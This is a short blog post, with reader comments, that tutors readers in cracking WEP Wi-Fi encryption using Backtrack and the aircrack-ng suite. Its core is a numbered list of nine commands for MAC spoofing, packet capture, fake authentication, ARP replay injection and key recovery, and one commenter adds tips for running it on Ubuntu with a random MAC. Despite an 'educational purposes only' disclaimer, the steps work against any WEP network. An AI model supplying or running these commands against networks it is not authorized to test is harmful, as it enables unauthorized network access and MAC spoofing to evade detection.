How to Crack WEP Encryption With Backtrack
While browsing YouTube, I came across this video that tells you how to crack any WEP encryption.
Watch the video below showing how to crack your own WEP key using Backtrack. This tutorial is for educational purposes only.
Required Tools
- You will need a computer with a wireless adapter listed here
- Download Backtrack and burn it’s image to a CD
Required Codes
1)airmon-ng stop eth1
2)ifconfig eth1 down
3)macchanger –mac 00:11:22:33:44:55 eth1
4)airmon-ng start eth1
5)airodump-ng eth1
6)airodump-ng -c (channel) -w (file name) –BSSID (BSSID) eth1
7)aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 eth1
8)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1
9)aircrack-ng -b (BSSID) (filename-01.cap)
Pingback: How to Crack WEP Encryption With Backtrack | Information Technology
Pingback: How to Crack WEP Encryption With Backtrack
I just used ubuntu and downloaded both aircrack-ng and macchanger packages as well as dependencies. Afterwards I just followed the above command list. Instead of defining a fixed mac address on macchanger I just used ‘macchanger –random’ and made note of the new one for each of the remaining commands. It is easier if you do aireplay and aircrack on their own windows. You can leave the latter one running even while airodump is running as it will retry every 5000 IVs collected.
Thats great!
I am currently on Windows!
BackTrack 5 has been released. This new revision has been built from scratch and boasts several major improvements over all our previous releases. Download Backtrack 5 Now
Don t understand how exactly i got in here but i m really glad i ve found it. Neaah… i m starting to believe google is begining to read my mind
Nice build!